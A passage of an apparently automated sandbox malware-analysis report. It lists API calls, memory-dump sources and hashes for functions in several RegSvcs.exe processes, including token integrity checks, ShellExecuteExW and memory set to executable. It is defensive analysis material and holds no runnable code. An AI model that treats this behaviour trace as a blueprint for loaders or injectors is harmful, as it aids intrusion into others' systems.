Part of subcall function 05C756A7: GetTokenInformation.KERNELBASE(05C755D0,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C756D4
Part of subcall function 05C756A7: GetLastError.KERNEL32(?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C756DA
Part of subcall function 05C756A7: malloc.MSVCRT ref: 05C756E8
Part of subcall function 05C756A7: GetTokenInformation.KERNELBASE(05C755D0,00000019(TokenIntegrityLevel),00000000,?,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C75702
Part of subcall function 05C756A7: GetSidSubAuthorityCount.ADVAPI32(00000000,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C7570A
Part of subcall function 05C756A7: GetSidSubAuthority.ADVAPI32(00000000,?,?,05C755D0,00000000,?,?,00000000,00000000,05C7D278), ref: 05C7571A
Part of subcall function 05C756A7: free.MSVCRT ref: 05C75723

GetCommandLineW.KERNEL32 ref: 05C76409
lstrlenW.KERNEL32(00000000), ref: 05C7641B
calloc.MSVCRT ref: 05C76427
lstrcpyW.KERNEL32(00000000,00000000), ref: 05C7643B
lstrcatW.KERNEL32(00000000,00000000), ref: 05C7644E
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 05C76466
free.MSVCRT ref: 05C7648C

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformationProcessfree$CommandCountCurrentErrorFileLastLineModuleNameOpencalloclstrcatlstrcpylstrlenmalloc
String ID:
API String ID: 2763388985-0
Opcode ID: e4686638e8ab0d57a328354617fa90d9d53b071b94740244b966dc4d2dcdf5d0
Instruction ID: 3143b7025dadf2b8f0cd0863190a4042d77ee34175f977e22ea8f197898c45b9
Opcode Fuzzy Hash: e4686638e8ab0d57a328354617fa90d9d53b071b94740244b966dc4d2dcdf5d0
Instruction Fuzzy Hash: D911C47224021D6FE720ABB0AC8EB6E3F6CEB05355F104835F503C1881DE2099C085E5

Function 05C7546E Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(05C749E7,00000001(TokenIntegrityLevel),00000000,00000000,?,00000000,00000000,?,?,05C749E7), ref: 05C7548B
GetLastError.KERNEL32(?,?,05C749E7), ref: 05C75491
malloc.MSVCRT ref: 05C7549F
memset.NTDLL ref: 05C754B2
GetTokenInformation.ADVAPI32(05C749E7,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,05C749E7), ref: 05C754C7
free.MSVCRT ref: 05C754CE

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InformationToken$ErrorLastfreemallocmemset
String ID:
API String ID: 80620216-0
Opcode ID: f6de4184a6b02839887b8c6d1b0a6f3bfca7c3c0febbcc768bc4ea2b50b08ef1
Instruction ID: 22f5e49930e8356ff5d6b1c9ac8b6e6bcc1fa5e36b509bd87ff5cd1f81cae8de
Opcode Fuzzy Hash: f6de4184a6b02839887b8c6d1b0a6f3bfca7c3c0febbcc768bc4ea2b50b08ef1
Instruction Fuzzy Hash: 70012C36510109BBDB219B91ED4AFAE7F7AEB81651F204465FA00A1550DB719F019AA0

Function 05C736D7 Relevance: 8.8, APIs: 7, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,00000000), ref: 05C736FD
lstrcmpiW.KERNEL32(?,00000000), ref: 05C7370C
lstrcmpiW.KERNEL32(?,00000000), ref: 05C73722
lstrcmpiW.KERNEL32(?,00000000), ref: 05C73738
lstrcmpiW.KERNEL32(?,00000000), ref: 05C7374E
lstrcmpiW.KERNEL32(?,00000000), ref: 05C7375D
lstrcmpiW.KERNEL32(?,00000000), ref: 05C73773

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: e66e11b3cbdaff0c522a914d8e69a9ef02754b9e593674c64af273ff7c392fc1
Instruction ID: 84b7722f53847c905a0d3bdacfa2aa267318ccdee90c8ec7da53fd0d47d6cfd5
Opcode Fuzzy Hash: e66e11b3cbdaff0c522a914d8e69a9ef02754b9e593674c64af273ff7c392fc1
Instruction Fuzzy Hash: A50121A174131FAD662C7671EECAC3B6F6DDD009A07141C1AF902D5800EA709D01E971

Function 05C7649A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 05C764AB
ShellExecuteExW.SHELL32(?), ref: 05C764EB
CloseHandle.KERNEL32(?,?,?,00000000), ref: 05C764FF
GetLastError.KERNEL32(?,?,00000000), ref: 05C7650E

Strings

@, xrefs: 05C764CD

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseErrorExecuteHandleLastShellmemset
String ID: @
API String ID: 3899250325-2766056989
Opcode ID: 8bef6724b0e2262ff1069f8cd05afad4c2bc4766ec0aabd9e40ada2c59a95a18
Instruction ID: d04044502b53562ec510a362283c908fe1c4be808a4ab7dde240c1a675005a01
Opcode Fuzzy Hash: 8bef6724b0e2262ff1069f8cd05afad4c2bc4766ec0aabd9e40ada2c59a95a18
Instruction Fuzzy Hash: 48011771E0021CABCB14AFA5D849BCEBFB8AB44750F004426F905A7644DB748A44DBA0

Function 05C7610C Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 124stringCOMMON

Download Yara Rule

APIs

Part of subcall function 05C76268: rand.MSVCRT ref: 05C76272
Part of subcall function 05C76268: rand.MSVCRT ref: 05C7629C

strlen.NTDLL ref: 05C76158
strcpy.NTDLL(?,?,?,?,00000000,?,?,?), ref: 05C7621D
calloc.MSVCRT ref: 05C7622B
free.MSVCRT ref: 05C76259

Strings

YHR!, xrefs: 05C76175

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: rand$callocfreestrcpystrlen
String ID: YHR!
API String ID: 639936413-757886148
Opcode ID: 0fd8cf07aea84f872b2b382506b6d886b7c86ce98d5bbc627cc512f2cba49958
Instruction ID: 759fd34c4ef95ba7f36dc6af861d35ce2cb5279b75a685461a3c42cf9488d804
Opcode Fuzzy Hash: 0fd8cf07aea84f872b2b382506b6d886b7c86ce98d5bbc627cc512f2cba49958
Instruction Fuzzy Hash: 29417175900749EFCB20DF68C98499ABBF4FF08314B14896AE499C7B41E730EA41DF94

Function 05C740A0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 05C74107
VerSetConditionMask.NTDLL(00000000), ref: 05C7410B
VerSetConditionMask.NTDLL(00000000), ref: 05C7410F
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 05C74138

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: b55190278f26483175a000c8ee8b75598f7cf0dfe9b0043bf92f8352b03757fd
Instruction ID: 3fbe49b7c4d5ba7bbf33c846b86e0ca5b060f0d91421ad70cbceecd1677fed68
Opcode Fuzzy Hash: b55190278f26483175a000c8ee8b75598f7cf0dfe9b0043bf92f8352b03757fd
Instruction Fuzzy Hash: 30112871D5061DBADF24DF65DC06BDABBB8EF98700F008499B208A7190E6B05780CFD1

Function 05C75070 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05C75141
VirtualProtect.KERNEL32(00000000,?,00000040,00000071), ref: 05C7516A

Strings

q, xrefs: 05C75078

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProtect
String ID: q
API String ID: 2447062925-4110462503
Opcode ID: 73b63ece777f90ca7d5b8c8a7f8b51900f353f409f2aa9738a132665904a6677
Instruction ID: 40330897d2ef837d196b5a9d1662c1242fd3764cc51507470d84fb25944346e9
Opcode Fuzzy Hash: 73b63ece777f90ca7d5b8c8a7f8b51900f353f409f2aa9738a132665904a6677
Instruction Fuzzy Hash: 9431F970A0466C6BE7358B398C92ABE7F95FB41341F148C1AF9A6C6640D635EB00DBD0

Analysis Process: RegSvcs.exePID: 7968, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 05CDA070 Relevance: 1.6, APIs: 1, Instructions: 342
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05CDA438

Memory Dump Source

Source File: 00000006.00000002.2401955696.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_RegSvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 89c0c977ee636166e89f64928d47eefa2387cf4187ce31d85920aa36e9c623c9
Instruction ID: c0415f4a8a84447507eabcf9c53e5a43cca17a4c2691a27be411ea183996cbaa
Opcode Fuzzy Hash: 89c0c977ee636166e89f64928d47eefa2387cf4187ce31d85920aa36e9c623c9
Instruction Fuzzy Hash: 6EB1F975B043058FDB14CA6DCC90BBEF6A3AFC8320F188929EA06DB781DB74D9419761

Function 04FF12CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 04FF1314

Part of subcall function 04FF1098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 04FF10C1
Part of subcall function 04FF1098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04FF126D

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 04FF1366
VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 04FF13C0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04FF13F3

Strings

,, xrefs: 04FF1344

Memory Dump Source

Source File: 00000006.00000002.2386433415.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ff0000_RegSvcs.jbxd

Similarity

API ID: Virtual$Alloc$Free$Protect
String ID: ,
API String ID: 1004437363-3772416878
Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction ID: 676bbdc31391ae3013a5f01a363bf84c4fb44cbc2e25f9ed7d4a4221972655b5
Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction Fuzzy Hash: D4510775900309EFDB10DFA9CD80A9EBBB4FF08744F10851AEA59A7650D370F955CBA4

Function 04FF0042 Relevance: 4.6, APIs: 3, Instructions: 135
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000008,?), ref: 04FF0088
RtlAllocateHeap.NTDLL(?,00000008,?), ref: 04FF0155
RtlFreeHeap.NTDLL(?,00000000,?,?,?,?,00000000), ref: 04FF0180

Memory Dump Source

Source File: 00000006.00000002.2386433415.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ff0000_RegSvcs.jbxd

Similarity

API ID: Heap$Allocate$Free
String ID:
API String ID: 4277724868-0
Opcode ID: 08cf8e03b6d0363485821097fafb167ff7731e56f063e696cb54c532aa5d098f
Instruction ID: 10c76b109dfd6fd1d4dca09861925727dcbcc461516c8d81a5aba74c29697731
Opcode Fuzzy Hash: 08cf8e03b6d0363485821097fafb167ff7731e56f063e696cb54c532aa5d098f
Instruction Fuzzy Hash: 1B515B71D00709EFDF21CFA4CC84AEEBBB9FF44705F14452AEA45A6252DB30AA46CB50

Function 04FF1098 Relevance: 2.7, APIs: 2, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 04FF10C1
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04FF126D

Memory Dump Source

Source File: 00000006.00000002.2386433415.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ff0000_RegSvcs.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: a8fa3d97db074f9fa3e71bc4a3834a271ac83250f3511d1bb533cd2208612132
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 12717A72E04249DFDB41CF98CA81BEEBBF0EF09314F144095E565FB291D234AA92DB64

Function 05CDAB60 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05CDABD3

Memory Dump Source

Source File: 00000006.00000002.2401955696.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_RegSvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: dee609392d78c68afb9a2fc62db98c569d47651bcac7e56462687becd34b8583
Instruction ID: d464d687c4b63b6ceb1a3cfe99cb21f615e6b1cbb0ba9d9e2326dd64900695b6
Opcode Fuzzy Hash: dee609392d78c68afb9a2fc62db98c569d47651bcac7e56462687becd34b8583
Instruction Fuzzy Hash: 402106B68002499FCB10DF9AC884BDEFBF5FB48320F108429E559A7341D778AA44CFA1

Function 028A5868 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 028A58E3

Memory Dump Source

Source File: 00000006.00000002.2382120221.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_28a0000_RegSvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 71509ba93408979b31757a5de0eea2964e3b87129c840b61634e14d0ac7302ce
Instruction ID: c330c77b4ecc25085182ac28702f7f38a29a603dc54f933e7791bfbfb057a5ea
Opcode Fuzzy Hash: 71509ba93408979b31757a5de0eea2964e3b87129c840b61634e14d0ac7302ce
Instruction Fuzzy Hash: D421E4B9D006499FCB10DFAAD884ADEFBF4FF48314F10842AE459A7251C778A644CFA1

Function 028A5870 Relevance: 1.6, APIs: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 028A58E3

Memory Dump Source

Source File: 00000006.00000002.2382120221.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_28a0000_RegSvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7e811219cb5faa66a7f0d2722acf6890dd25ff2be4e9f778ff26c981bcc2abe4
Instruction ID: 99bce2fe1c76f690cdb11430f0601bade687d5edbf3c0aa3e49c3aafdbdbebfc
Opcode Fuzzy Hash: 7e811219cb5faa66a7f0d2722acf6890dd25ff2be4e9f778ff26c981bcc2abe4
Instruction Fuzzy Hash: 6511E4B9D002499FCB10DF9AC484ADEFBF4FB48310F108429E919A7250C778A544CFA1

Function 04FF0168 Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,?,?,?,00000000), ref: 04FF0180

Memory Dump Source

Source File: 00000006.00000002.2386433415.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ff0000_RegSvcs.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: add37e244735a9280bbbef2fcfd4343c7b951f97e63cf88fc1328bb2bece4452
Instruction ID: 95ac80f32245608f86243e626f08f6c5270577aa8161589b2b794d742ca016b9
Opcode Fuzzy Hash: add37e244735a9280bbbef2fcfd4343c7b951f97e63cf88fc1328bb2bece4452
Instruction Fuzzy Hash: 09E01A31E0060AEFDF229FD9CC449EFFBB1EF84306F184526D211A1025DB326552CB11

Function 028A591A Relevance: 1.3, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 028A597F

Memory Dump Source

Source File: 00000006.00000002.2382120221.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_28a0000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6c99251e296850595e73421028479cde3ef0a137300840463ccf3fc86e6ffb6d
Instruction ID: d0742b0dd2ff2056ff222dbeb488fc951eac435e51f3715f67490efc9c944e87
Opcode Fuzzy Hash: 6c99251e296850595e73421028479cde3ef0a137300840463ccf3fc86e6ffb6d
Instruction Fuzzy Hash: E41122B48003498FDB10DF9AD848BDEFBF4EF49324F24845AD558A7240C778A944CFA1

Function 028A5920 Relevance: 1.3, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 028A597F

Memory Dump Source

Source File: 00000006.00000002.2382120221.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_28a0000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ce7b5e1fd76bcc30b1bf20ac6e6a36064bee7b3fffe4d143551a9c143c086397
Instruction ID: 588d62b296b23bb39ba598f722f63112ba650766abe277553514e36d4cd264c6
Opcode Fuzzy Hash: ce7b5e1fd76bcc30b1bf20ac6e6a36064bee7b3fffe4d143551a9c143c086397
Instruction Fuzzy Hash: BB1100B98007488FDB10DF9AD848BDEFBF4EB48324F24845AD518A7250C779A944CFA5

Function 0285D01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2381965165.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_285d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587b60df7e2c5b2a6a03f72c76a52380bf0fa9e50b3c7541399f185cc06f21d7
Instruction ID: fbd90bd8f01980bcfa2ba029c6ed3ecfd6be91afb2cf944644afc4bab876a941
Opcode Fuzzy Hash: 587b60df7e2c5b2a6a03f72c76a52380bf0fa9e50b3c7541399f185cc06f21d7
Instruction Fuzzy Hash: D721B079604204DFDB14DF24D984B26BFA5EB84318F24C66DDD0E8B352C33AD847C662

Function 0285D005 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2381965165.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_285d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442fcbbe441543c72a08eecc5740e006d144bdc552b73eab18e97ddc66f48e6e
Instruction ID: 2f5546ad7cdabd31fb3105bea69018538854b44b0b02d554b4ef4a57877d22e8
Opcode Fuzzy Hash: 442fcbbe441543c72a08eecc5740e006d144bdc552b73eab18e97ddc66f48e6e
Instruction Fuzzy Hash: A82184795093808FDB16CF24C594B15BF71EF45214F28C5DADC498B6A3C33A984ACB52

Analysis Process: RegSvcs.exePID: 8000, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00E2A230 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 00E2A290

Memory Dump Source

Source File: 00000007.00000002.2524826869.0000000000E2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e2a000_RegSvcs.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e833e9dc8f4fd7fff9b545f52ff4a80a2cb8dd10b1ac6a7d07d5efb620e91551
Instruction ID: 8de2776ec9b782c21976e8d5d2620caf200e5f56c5a044d691d722d199e4a1f2
Opcode Fuzzy Hash: e833e9dc8f4fd7fff9b545f52ff4a80a2cb8dd10b1ac6a7d07d5efb620e91551
Instruction Fuzzy Hash: 3B116D714093C09FDB128B15DD54B62BFB4DF47624F0884DAED858F663C2656808DB62

Function 00E2A25E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 00E2A290

Memory Dump Source

Source File: 00000007.00000002.2524826869.0000000000E2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e2a000_RegSvcs.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 43ce12f3a3556f0dd4dbb608fd7a980c915f4a12b9bce7bb3d71d18284f6fafc
Instruction ID: 11092b2ff935c022c986b243a71a1040a252cd30c516782c18b7d822df8a8c62
Opcode Fuzzy Hash: 43ce12f3a3556f0dd4dbb608fd7a980c915f4a12b9bce7bb3d71d18284f6fafc
Instruction Fuzzy Hash: EDF0AF36904244CFDB20CF06E984761FBE4EF08724F0CC4AADD495B762D276A848CEA3

Function 011D024C Relevance: .4, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2525511920.00000000011D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 067c601da846fed5470b18a94a679f80cb84862e98ba2bcd84f61ed80fbb6d6a
Instruction ID: 3aa044e8516b603caa15191b6f7937cf7c4a74b2ff7bf852ac036c3693d18e23
Opcode Fuzzy Hash: 067c601da846fed5470b18a94a679f80cb84862e98ba2bcd84f61ed80fbb6d6a
Instruction Fuzzy Hash: B331A76254F3C14FD7079B709C252A0BFB0AE03225B1E80EBC484CF1A3E22A584AC777

Function 011D05E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2525511920.00000000011D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189e4c71f190e3020e00fa8ca1f0c0f10bd45eefc4b66dea7a59f0e0937065a2
Instruction ID: c135d4f8bdce93545a7588a22b992f0be62f864bf8ac8ef6bb289c8dd9adc370
Opcode Fuzzy Hash: 189e4c71f190e3020e00fa8ca1f0c0f10bd45eefc4b66dea7a59f0e0937065a2
Instruction Fuzzy Hash: 5401D6B65093845FC711CF06AC40853FFF8EF4623070984ABEC4C9B612D135B909CBA2

Function 011D0606 Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2525511920.00000000011D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9838486bff3df91fa2a9afd4def5cfcb00305026241976a26f5ca1cca722bb9
Instruction ID: 8cf03272d8c178cc032989775a39c163e8f24165d3053eceae47f0256ac0a58b
Opcode Fuzzy Hash: a9838486bff3df91fa2a9afd4def5cfcb00305026241976a26f5ca1cca722bb9
Instruction Fuzzy Hash: 7EE092B66046044B9650CF0BEC41452F7D8EB88630748C07FDC0D8BB01D275B909CAA6

Function 00E223F4 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2524786144.0000000000E22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E22000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e22000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d287d8962b06b5550221ef5f44a2f16a9b766bce893f6585e571a82ea995396
Instruction ID: a6c39ca21801d78e6aeca2100ef6cd04b5bc7dc156c1255bc948bb32e7fc7f07
Opcode Fuzzy Hash: 5d287d8962b06b5550221ef5f44a2f16a9b766bce893f6585e571a82ea995396
Instruction Fuzzy Hash: F2D02E392046D04FD312AA0CD2A8B8537D4AB40708F0A00FEAC008B763CB68E880EA00

Function 00E223BC Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2524786144.0000000000E22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E22000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e22000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ea7cf23e9b57c37dcf7d7b3da66395a9ef534af614062bb84d9a355df95c13
Instruction ID: 849a2b6f473fce7f5f2da993b615a76ee648a9b214bdae1567ac4cbfb37c93d2
Opcode Fuzzy Hash: a3ea7cf23e9b57c37dcf7d7b3da66395a9ef534af614062bb84d9a355df95c13
Instruction Fuzzy Hash: B4D05E342402924FC719DA0CD6D4F5937D4AF44718F0644ECAC108B762C7A8E9C0DA00

Analysis Process: RegSvcs.exePID: 8016, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 010FA230 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 010FA290

Memory Dump Source

Source File: 00000008.00000002.2524221441.00000000010FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10fa000_RegSvcs.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 42f60db1d950a23ef4bf27f4eaedeb4b1be45ded3148901d9a5059caaf383909
Instruction ID: d237980b005d42cb5125dc4d44fd17263f38d35ba89ebbaaebe3537c31e87478
Opcode Fuzzy Hash: 42f60db1d950a23ef4bf27f4eaedeb4b1be45ded3148901d9a5059caaf383909
Instruction Fuzzy Hash: 16116D715093C09FDB128B25DC54A62BFB4DF47624F0880CAEDC48F663C265A808DB72

Function 010FA25E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

